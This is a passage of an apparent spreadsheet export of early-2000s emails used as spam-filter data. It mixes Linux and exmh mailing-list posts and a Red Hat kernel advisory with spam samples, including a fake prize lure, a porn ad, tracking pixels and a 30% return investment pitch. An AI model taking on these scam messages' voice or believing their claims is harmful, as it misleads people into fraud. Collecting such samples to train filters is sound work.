 Z/kAnRVbL3IA/m03PVTM6O4h9R4AKqML
 =k5cA
 -----END PGP SIGNATURE-----
 --2+N3zU4ZlskbnZaJ--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Friend, Act FAST! Getting a CREDIT CARD is as easy as 1,2,3!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;index.gif&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#006699" link="#FFFFFF"&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="542" align="center"&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img src="http://209.126.159.62/spacer.gif" width="149" height="1" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://209.126.159.62/spacer.gif" width="165" height="1" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://209.126.159.62/spacer.gif" width="228" height="1" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://209.126.159.62/spacer.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td&gt;&lt;img name="index_r1_c1" src="http://209.126.159.62/index_r1_c1.gif" width="149" height="193" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img name="index_r1_c2" src="http://209.126.159.62/index_r1_c2.gif" width="165" height="193" border="0"&gt;&lt;/td&gt;
     &lt;td rowspan="2"&gt;&lt;a href="http://click.mm53.com/sp/t.pl?id=3217:7552100"&gt;&lt;img name="index_r1_c3" src="http://209.126.159.62/index_r1_c3.gif" width="228" height="221" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://209.126.159.62/spacer.gif" width="1" height="193" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
    &lt;td rowspan="2" colspan="2"&gt;&lt;img name="index_r2_c1" src="http://209.126.159.62/index_r2_c1.gif" width="314" height="143" border="0"&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://209.126.159.62/spacer.gif" width="1" height="28" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;a href="http://click.mm53.com/sp/t.pl?id=3218:7552100"&gt;&lt;img name="index_r3_c3" src="http://209.126.159.62/index_r3_c3.gif" width="228" height="115" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
    &lt;td&gt;&lt;img src="http://209.126.159.62/spacer.gif" width="1" height="115" border="0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="500" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td&gt; &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;IMG SRC="http://click.mm53.com/sp/t.pl?id=3219:7552100&amp;o=1" BORDER=0 WIDTH=0 HEIGHT=0&gt; &lt;BR&gt;&lt;P&gt;&lt;BR&gt;&lt;!-- 
 SKY-Email-Address: cypherpunks@einstein.ssz.com 
 SKY-Database: OnlyTheBest
 --&gt;
 &lt;A NAME='unsub'&gt;
 &lt;TABLE align=center border=1 cellpadding=5 cellspacing=0 bordercolor=gray&gt;
 &lt;TD&gt;&lt;TABLE width="600" align=center cellpadding="0" cellspacing="0" border="0" &gt;&lt;TR&gt;
 &lt;TD height=25&gt;&lt;FONT size="2" face="arial,sans-serif" color=gray&gt;Remove yourself from this recurring list by:&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD&gt;&lt;FONT color="gray" size="2" face="arial,sans-serif"&gt;&lt;A href="mailto:unsub-7552100-332@mm53.com"&gt;Clicking here&lt;/A&gt; to send a blank email to unsub-7552100-332@mm53.com&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD align="center"&gt;&lt;FONT size="2" face="arial,sans-serif"&gt;&lt;I&gt;OR&lt;/I&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD&gt;&lt;FONT face="arial,sans-serif" color="gray" size="2"&gt;Sending a postal mail to CustomerService, 427-3 Amherst Street, Suite 319, Nashua, NH 03063&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;TR&gt;
 &lt;TD align="CENTER"&gt;&lt;br&gt;&lt;FONT face="arial,sans-serif" size="2" color="black"&gt;&lt;I&gt;This message was sent to address cypherpunks@einstein.ssz.com&lt;/I&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TABLE&gt;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</si>
  <si>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girls
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;TABLE WIDTH=100% BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD align=center valign=middle BGCOLOR=#0A0A5A&gt;&lt;center&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;font color=#FFFF00 size=5 face="Geneva, Arial, Helvetica, san-serif"&gt;&lt;strong&gt;GET FREE ACCESS TO XXX PORN!&lt;/strong&gt;&lt;/font&gt;&lt;/a&gt;&lt;br&gt;&lt;table width=100 border=3 cellspacing=0 cellpadding=0&gt;&lt;tr&gt;&lt;td&gt;&lt;TABLE WIDTH=550 BORDER=0 CELLPADDING=0 CELLSPACING=0&gt;&lt;TR&gt;&lt;TD COLSPAN=3&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_01.jpg WIDTH=550 HEIGHT=112 border=0&gt;&lt;/a&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_02.gif WIDTH=104 HEIGHT=231 border=0&gt;&lt;/a&gt;&lt;/TD&gt;&lt;TD&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_03.jpg WIDTH=339 HEIGHT!
  =231 border=0&gt;&lt;/a&gt;&lt;/TD&gt;&lt;TD&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_04.gif WIDTH=107 HEIGHT=231 border=0&gt;&lt;/a&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD COLSPAN=3&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;IMG SRC=http://www.freepornsecrets.net/art/freepornsecrets/HC_FPS_05.gif WIDTH=550 HEIGHT=57 border=0&gt;&lt;/a&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;a href=http://www.freepornsecrets.net/bnr/3001J86020 target=_blank&gt;&lt;strong&gt;&lt;font color=#FFFF00 size=5 face="Geneva, Arial, Helvetica, san-serif"&gt;INSTANT ACCESS... 100% FREE HARDCORE&lt;/font&gt;&lt;/strong&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;div align=center&gt;&lt;font face="Times New Roman, Times, serif" size=1 color=#710000&gt;Note: If you would would like to be removed from our list, please reply to this email with the word REMOVE as the subject&lt;/font&gt;&lt;/div&gt;&lt;/center&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/HTML&gt;
 hxvwnj3q
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] OSI protocol
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Jul 19, 2002 at 04:09:50PM +0100, Ryan, Shane wrote:
 &gt; Hi,
 &gt; 
 &gt; I wasn't sure if that ever started up.
 &gt; what irc server is #ilug on?
 &gt; 
 #linux on irc.linux.ie
 Steve
 -- 
 "Oh look, it's the Pigeon of Love."
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">
 In message &lt;200209130231.g8D2VO021580@hobbit.linuxworks.com.au.nospam&gt;, Tony Nu
 gent writes:
 &gt; 
 &gt; I have set my right mouse button to [Move] a message to another
 &gt; folder, which works fine.
 &gt; 
 &gt; However, [Link] also uses the same destination folder as [Move], and
 &gt; so if I want to use [Link] I first have to mark the destination
 &gt; folder with a message-move, undo the move, then I can use the
 &gt; [Link].  Very inconvenient.
 &gt; 
 &gt; Is there a better way for me to set this up so that [Link] works
 &gt; with one or two simple clicks?
 &gt; 
 According to some old documentation (man exmh-ref)
      The mouse bindings for the folders labels are:
           Left - Change to folder.
           Middle - View nested folders.
           Right - Refile current messages to the folder.
           Shift-Right - Link current messages to the folder.
           Shift-Middle - Drag a folder label to some drop target.
           Control-Right - Clear the current target folder.
 It should be possible to link using shift-right-click the same way you 
 can move using only right-click.
 Kevin
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A different sort of Fox News
</t>
  </si>
  <si>
    <t xml:space="preserve">This was just *too* funny.. rotflma.
 http://www.ozyandmillie.org/comics/om20020924.gif
 -- 
 #ken	P-)}
 Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
 Author, developer, opinionist      http://Apache-Server.Com/
 "Millennium hand and shrimp!"
</t>
  </si>
  <si>
    <t xml:space="preserve">    Date:        Wed, 11 Sep 2002 20:15:00 -0700
     From:        Brent Welch &lt;welch@panasas.com&gt;
     Message-ID:  &lt;200209120315.XAA25189@blackcomb.panasas.com&gt;
   | exmh has a funky cut/paste model that is essentially all my fault.
   | The middle click sets the insert point.  If you hate that, go to the
   | Bindings... Simple Edit preferences window and de-select
   | "Paste Sets Insert".  
 Unfortunately, the side effect of that solution is that it is no longer
 possible to cut/paste within one sedit window, some intermediate client
 always must be used (except in the rare case where you want to select
 some text, and then paste it at the same place).
 That's because the click that you have to (with this option) make to set
 the insert point, also kills the selection (it ends up reverting to the
 last selection made in some other window, or something like that).
 So, the vast majority of people probably want that "Paste Sets Insert"
 enabled - that one you can learn to live with, the other is much more
 painful.
 kre
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: JPEGs patented
</t>
  </si>
  <si>
    <t xml:space="preserve">------------------------------------------------------------------------------
 A video conferencing company based in Austin, Texas says it's going to
 pursue royalties on the transmission of JPEG images.
 And it's already found a licensee: Sony Corporation.
 Formerly known as VTEL, Forgent Networks acquired Compression Labs in
 1997, acquiring this patent into the bargain.  The patent claim was
 filed in 1986 but Compression Labs never pursued royalties.
 [...]
 ------------------------------------------------------------------------------
 Rest at:
   http://www.theregister.co.uk/content/4/26272.html
 The patent is at:
   http://patft.uspto.gov/netacgi/nph-Parser?Sect1=PTO1&amp;Sect2=HITOFF&amp;d=PALL&amp;p=1&amp;u=/netahtml/srchnum.htm&amp;r=1&amp;f=G&amp;l=50&amp;s1='4,698,672'.WKU.&amp;OS=PN/4,698,672&amp;RS=PN/4,698,672
 Groan,
   Rob.
      .-.                                                               .-.
     /   \           .-.                                 .-.           /   \
    /     \         /   \       .-.     _     .-.       /   \         /     \
   /       \       /     \     /   \   / \   /   \     /     \       /       \
  /         \     /       \   /     `-'   `-'     \   /       \     /         \
             \   /         `-'                     `-'         \   /
              `-'                                               `-'
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] HOT BUISNESS OPPORTUNITY WANT TO MAKE MONEY?
</t>
  </si>
  <si>
    <t xml:space="preserve">WANT TO MAKE MONEY?
 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 HOT BUSINESS OPPERTUNITY AVAILABLE
 fOR THOSE WHO QUALIFY...
 1.  MUST BE A UNITED STATES RESIDENT
 2.  MUST BE 21 YEARS OF AGE OR OVER.
 YOU WILL SHARE IN DIALYSIS CENTERS OF AMERICA
 LATEST CASH INCOME STREAM.
 EARN OVER 30% RETURN ON YOUR MONEY!
 INTEREST PAID ANNUALLY!
 COMPLETELY LEGAL.
 TO FIND OUT ALL THE HOW'S AND WHY'S,
 REPLY TODAY WITH YOUR NAME, STATE AND COMPLETE PHONE 
 NUMBER.  DETAILS WILL SOON FOLLOW!
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 webmake-talk mailing list
 webmake-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;&gt;&gt; Jeremy Hylton wrote
 &gt; Then I tried a dirt simple tokenizer for the headers that tokenize the
 &gt; words in the header and emitted like this "%s: %s" % (hdr, word).
 &gt; That worked too well :-).  The received and date headers helped the
 &gt; classifier discover that most of my spam is old and most of my ham is
 &gt; new.
 Heh. I hit the same problem, but the other way round, when I first
 started playing with this - I'd collected spam for a week or two, 
 then mixed it up with randomly selected messages from my mail boxes.
 course, it instantly picked up on 'received:2001' as a non-ham. 
 Curse that too-smart-for-me software. Still, it's probably a good
 thing to note in the documentation about the software - when collecting
 spam/ham, make _sure_ you try and collect from the same source.
 Anthony
 -- 
 Anthony Baxter     &lt;anthony@interlink.com.au&gt;   
 It's never too late to have a happy childhood.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hopes fade in Ulster crisis talks
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8655705,215/
 Date: 2002-10-08T03:31:01+01:00
 Tony Blair to hold crisis summit with Ulster Unionist leader David Trimble in 
 Downing Street today.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: You Won The First Round! claim#	9462               27747
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;body&gt;
 &lt;p align=3D"center" style=3D"word-spacing: 0; margin-top: 0; margin-bottom=
 : 0"&gt;&lt;font size=3D"5" color=3D"#FF0000"&gt;&lt;b&gt;You Have Won The First Round!&lt;/=
 b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center" style=3D"word-spacing: 0; margin-top: 0; margin-bottom=
 : 0"&gt;&lt;b&gt;&lt;font size=3D"5" color=3D"#FF0000"&gt;Claim Your Entry Now!&lt;/font&gt;&lt;/b=
 &gt;&lt;/p&gt;
 &lt;p align=3D"center" style=3D"word-spacing: 0; margin-top: 0; margin-bottom=
 : 0"&gt;&lt;font size=3D"5" color=3D"#FF0000"&gt;&lt;b&gt;Collect The Prize Of The Week!&lt;=
 /b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center" style=3D"word-spacing: 0; margin-top: 0; margin-bottom=
 : 0"&gt;&lt;font size=3D"5" color=3D"#FF0000"&gt;&lt;b&gt;&lt;a href=3D"http://vdfe.weedwaac=
 ker.com"&gt;Click Here To Collect!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;p align=3D"center" style=3D"word-spacing: 0; margin-top: 0; margin-bottom=
 : 0"&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=3D"center"&gt;&lt;font size=3D"1"&gt;We apologize for any email you may ha=
 ve
 inadvertently received.&lt;br&gt;
 Please &lt;a href=3D"http://rmkid.weedwaacker.com"&gt;CLICK HERE&lt;/a&gt; to be remov=
 ed from
 future mailings.&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Linux Install
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hi,
 I think you need to give us a little more detailed information.
 On Wed, 04 Dec 2002, Gianni Ponzi wrote:
 &gt; I have a prob when trying to install Linux (tried RedHat, Suse) on my
 &gt; laptop. 
 You get _exactly_ the same problem with Suse and RedHat, is that right?
 What versions of these have you used?
 &gt; I can start the install but after about 2min, the whole pc just
 &gt; dies.
 As in freezes, reboots?  Do you get any errors?
 &gt; I know it's not a Linux prob and here is what I have encountered:
 &gt; 
 &gt; I had the same problem when installing Win on it and eventually sorted it
 &gt; out by disabling the infrared port. 
 Did you disable it in the BIOS or in windows?
 &gt; I'm guessing this might be same prob although I'm not sure. I am very new
 &gt; to Linux so it's not that easy for me to work it out. I did manage to
 &gt; follow the setup procedure at one stage (using images on disks) and it
 &gt; cuts out either as it's trying to verify what CD-Rom I have or just after
 &gt; (hence my suspicion of the infrared port again).
 1. What laptop is it?  What is the Processor and how much RAM does it have?
 2. You cannot simply boot off the cdrom?  It must be quite an old laptop
 then or else cdrom booting is disabled in the BIOS.  Is the cdrom external
 or strange in some way?
 Gavin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">CDale URLed thusly:
 &gt;http://www.news.harvard.edu/gazette/2000/10.19/01_monogamy.html
 &gt;The assumption that females of all species tend to be less promiscuous
 &gt;than males simply does not fit the facts, Hrdy contended.
 Well, DUH!!!
 It is perfectly obvious that (heterosexual) promiscuity is exactly,
 precisely identical between males and females.
 Of course the shapes of the distributions may differ.
 R
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RHN Errata Alert: New kernel update available, fixes i810 video oops, several security issues
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Red Hat Network has determined that the following advisory is applicable to
 one or more of the systems you have registered:
 Complete information about this errata can be found at the following location:
      https://rhn.redhat.com/network/errata/errata_details.pxt?eid=1159
 Security Advisory - RHSA-2002:158-09
 ------------------------------------------------------------------------------
 Summary:
 New kernel update available, fixes i810 video oops, several security issues
 Updated kernel packages are now available which fix an oops in the i810 3D
 kernel code. This kernel update also fixes a difficult to trigger race in
 the dcache (filesystem cache) code, as well as some potential security
 holes, although we are not currently aware of any exploits.
 Description:
 The 2.4.18-5 kernel introduced some safety checks in the VM subsystem that
 were triggered when exiting an X session while using 3D acceleration with
 the Intel i810/i815 chipset. Additionally, there was a difficult to trigger
 race in the dcache of the file system subsystem.
 This kernel update addresses both of these issues.
 In addition, there are fixes for potential security holes in the following
 drivers:
 stradis
 rio500
 se401
 usbvideo
 apm
 Finally, this kernel fixes a few files in the /proc file system which had
 the capability to expose kernel memory when abused.
 All of the security issues found during an audit and none of them,  at the
 time of this writing, have any known exploits.
 We would like to thank Silvio Cesare, Stas Sergeev, Andi Kleen, Solar
 Designer, and others for their auditing work.
 References:
 http://www.thefreeworld.net/non-US/
 ------------------------------------------------------------------------------
 -------------
 Taking Action
 -------------
 You may address the issues outlined in this advisory in two ways:
      - select your server name by clicking on its name from the list
        available at the following location, and then schedule an
        errata update for it:
            https://rhn.redhat.com/network/systemlist/system_list.pxt
      - run the Update Agent on each affected server.
 ---------------------------------
 Changing Notification Preferences
 ---------------------------------
 To enable/disable your Errata Alert preferences globally please log in to RHN
 and navigate from "Your RHN" / "Your Account" to the "Preferences" tab.
         URL: https://rhn.spamassassin.taint.org/network/my_account/my_prefs.pxt
 You can also enable/disable notification on a per system basis by selecting an
 individual system from the "Systems List". From the individual system view
 click the "Details" tab.
 ---------------------
 Affected Systems List
 ---------------------
 This Errata Advisory may apply to the systems listed below. If you know that
 this errata does not apply to a system listed, it might be possible that the
 package profile for that server is out of date. In that case you should run
 'up2date -p' as root on the system in question to refresh your software profile.
 There is 1 affected system registered in 'Your RHN' (only systems for
 which you have explicitly enabled Errata Alerts are shown).
 Release   Arch       Profile Name
 --------  --------   ------------
 7.3       i686       jalapeno                                
 The Red Hat Network Team
 This message is being sent by Red Hat Network Alert to:
     RHN user login:        spamassassin.taint.org
     Email address on file: &lt;yyyy-redhat@spamassassin.taint.org&gt;
 If you lost your RHN password, you can use the information above to
 retrieve it by email from the following address:
     https://rhn.redhat.com/forgot_password.pxt
 To cancel these notices, go to:
     https://rhn.redhat.com/oo.pxt?uid=1358455&amp;oid=1917980
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Pru Life's UL Portfolio Rocks
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_C2C45_01C258E6.DAEEA330
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  PruLife Universal Protector
  - and -
  Prulife Universal Plus
   ROCK!
 Case Closed! Permanent Life Insurance at Affordable Rates
 Whether your clients are looking to pay the Minimum Premiums needed to
 Endow* a policy at a specific age or pay sufficient premiums needed to
 guarantee** a death benefit for
 life, Prudential has the answer.
 PruLife Universal ProtectorSM offers competitive lifetime death benefit
 guarantee premiums. PruLife Universal PlusSM offers competitive minimum
 premiums to endow and competitive long term cash value accumulation.
 And that's not all. Look what else Prudential+ has to offer...
   _____  
 COMPETITIVE COMPENSATION	 
  	 Rolling Commissionable Target Premiums (R-CTP)++.
 First year compensation will be paid until the R-CTP is reached during
 the first 24 policy months. 	
  	 First year commissions that do not reduce at any issue age. 	
  COMPETITIVE UNDERWRITING	 
  	 Issue ages 0-90	 
  	 Continuation of coverage beyond age 100 (policy has no maturity
 age).	 
  	 Preferred Non-Smoker category for cigar smokers, pipe smokers
 and smokeless tobacco users (nicotine patch and gum users also may be
 eligible if they have not smoked cigarettes in the last 12 months) 	
  	 Preferred Plus Smoker category for healthy Cigarette Smokers.
  	 Aviation: Preferred rates may be offered to commercial pilots
 and most student and private pilots who fly up to 200 hours per year,
 regardless of whether helicopters or fixed wing aircraft are flown. 	
  	 Treadmills not required for preferred rates for face amounts
 within our capacity limits	 
  	 Improved Ratings for Prostate Cancer, Hepatitis B &amp; C	 
  	 Heart attack? Consider Prudential as soon as the prospect
 returns to normal activities	 
  	 Liberal Build Tables to qualify for Preferred rates	 
 INCREASED CAPACITY	 
  	 $70 million capacity without the need to discuss a risk with
 reinsurers.	 
  	 Facultative reinsurance may be available for cases in excess of
 $70 million.	 
   _____  
 Click our logo for the BGA nearest you!
 Click here for the NBC BGA Locator!
 &lt;http://www.insiq.com/resdir/special/nbc/&gt; 
 ? or ?
 Please fill out the form below for more information	 
 Name:	  	 	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	
  National Brokerage Consortium
 * Minimum Premium to Endow is a hypothetical, non-guaranteed premium
 that, based on current charges and the current interest rate, would keep
 the policy in force to age 100. Interest rates and charges will change
 over time, as will the Minimum Premium to Endow. These premiums are
 shown as hypothetical figures based on the stated assumptions and are
 shown for comparative purposes only. The actual premium needed to keep
 the policy in force is based on actual results and may be higher or
 lower. ** All guarantees are based on the claims-paying ability of the
 issuer. 
 + PruLife Universal Protector is issued by Pruco Life Insurance Company.
 PruLife Universal Plus also is issued by Pruco Life Insurance Company in
 all states except New Jersey and New York, where it is issued by Pruco
 Life Insurance Company of New Jersey, both Prudential Financial, Inc.
 companies located at 213 Washington Street, Newark, NJ 07102-2992. Each
 is solely responsible for its own financial condition and contractual
 obligations. 
 ++ Available on contracts dated Jan. 1, 2002 &amp; later. Not available in
 New York &amp; New Jersey.
 Prudential Financial is a service mark of The Prudential Insurance
 Company of America, Newark, NJ and its affiliates. For financial
 professional use only. Not for use with the public. 
 IFS-A072238 Ed. 7/2002 Exp. 12/2003	 
 We don't want anyone to receive our mailings who does not wish to. This
 is professional communication sent to insurance professionals. To be
 removed from this mailing list, DO NOT REPLY to this message. Instead,
 go here: http://www.InsuranceIQ.com/optout
 &lt;http://www.InsuranceIQ.com/optout&gt; 
 Legal Notice &lt;http://www.insuranceiq.com/legal.htm&gt;  
 ------=_NextPart_000_C2C45_01C258E6.DAEEA330
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Pru Life's UL Portfolio Rocks&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" cellpadding=3D"0" cellspacing=3D"0" =
 align=3D"center" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center"&gt;
 			&lt;img src=3D"http://iiq.us/images/nbc/20020701-101.gif" width=3D"550" =
 height=3D"50" alt=3D"PruLife Universal Protector"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/nbc/20020701-102.gif" =
 width=3D"550" height=3D"22" alt=3D"- and -"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/nbc/20020701-103.gif" =
 width=3D"550" height=3D"46" alt=3D"Prulife Universal Plus"&gt;&lt;br&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/nbc/20020701-104a.gif" =
 width=3D"93" height=3D"74"&gt;&lt;img =
 src=3D"http://iiq.us/images/nbc/20020701-105.jpg" width=3D"409" =
 height=3D"74" alt=3D"ROCK!"&gt;&lt;br&gt;
       &amp;nbsp; &lt;br&gt;=20
       &lt;table width=3D"100%" cellpadding=3D"2" cellspacing=3D"2" =
 border=3D"0" bgcolor=3D"#ffffff"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;p align=3D"center"&gt;
               &lt;b&gt;&lt;font size=3D"3"&gt;&lt;font color=3D"#FF0000"&gt;Case =
 Closed!&lt;/font&gt;
               Permanent Life Insurance at Affordable =
 Rates&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
             &lt;font size=3D"2"&gt;
             &lt;p&gt;Whether your clients are looking to pay the Minimum=20
               Premiums needed to Endow* a policy at a specific age or =
 pay sufficient=20
               premiums needed to guarantee** a death benefit for&lt;br&gt;
               life, Prudential has the answer.&lt;/p&gt;
             &lt;p&gt;PruLife Universal Protector&lt;sup&gt;SM&lt;/sup&gt; offers=20
               competitive lifetime death benefit guarantee premiums. =
 PruLife Universal=20
               Plus&lt;sup&gt;SM&lt;/sup&gt; offers competitive minimum premiums to =
 endow and=20
               competitive long term cash value accumulation.&lt;/p&gt;
             &lt;/font&gt;
             &lt;p align=3D"center"&gt;&lt;font size=3D"3"&gt;&lt;i&gt;And that's not all. =
 Look what=20
               else Prudential+ has to offer...&lt;/i&gt;&lt;/font&gt;&lt;/p&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td&gt;=20
             &lt;hr width=3D"90%" size=3D"1" color=3D"#000000"&gt;
             &lt;table width=3D"100%" border=3D"0" cellspacing=3D"2" =
 cellpadding=3D"2"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font size=3D"3" =
 color=3D"#000066"&gt;COMPETITIVE COMPENSATION&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;
                   &lt;font size=3D"2"&gt;&lt;b&gt;Rolling Commissionable Target =
 Premiums (R-CTP)++.&lt;/b&gt;&lt;br&gt;
                   First year compensation will be paid until the R-CTP =
 is reached=20
                   during the first 24 policy months.&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;
                   &lt;font size=3D"2"&gt; &lt;b&gt;First year commissions&lt;/b&gt;=20
                   that do not reduce at any issue age.&lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2"&gt;&lt;b&gt;&lt;font =
 color=3D"#000066"&gt;&amp;nbsp;COMPETITIVE UNDERWRITING&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Issue ages&lt;/b&gt; =
 0-90&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;&lt;font size=3D"2"&gt;&lt;b&gt;Continuation of =
 coverage&lt;/b&gt;=20
                   beyond age 100 (policy has no maturity =
 age).&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"5%"&gt;&amp;nbsp;&lt;/td&gt;
                 &lt;td width=3D"95%"&gt;
                   &lt;font size=3D"2"&gt;&lt;b&gt;Preferred Non-Smoker category&lt;/b&gt;
                   for cigar smokers, pipe smokers and smokeless tobacco =
 users=20
                   (nicotine patch and gum users also may be eligible if =
 they have=20
                   not smoked cigarettes in the last 12 months) &lt;/font&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
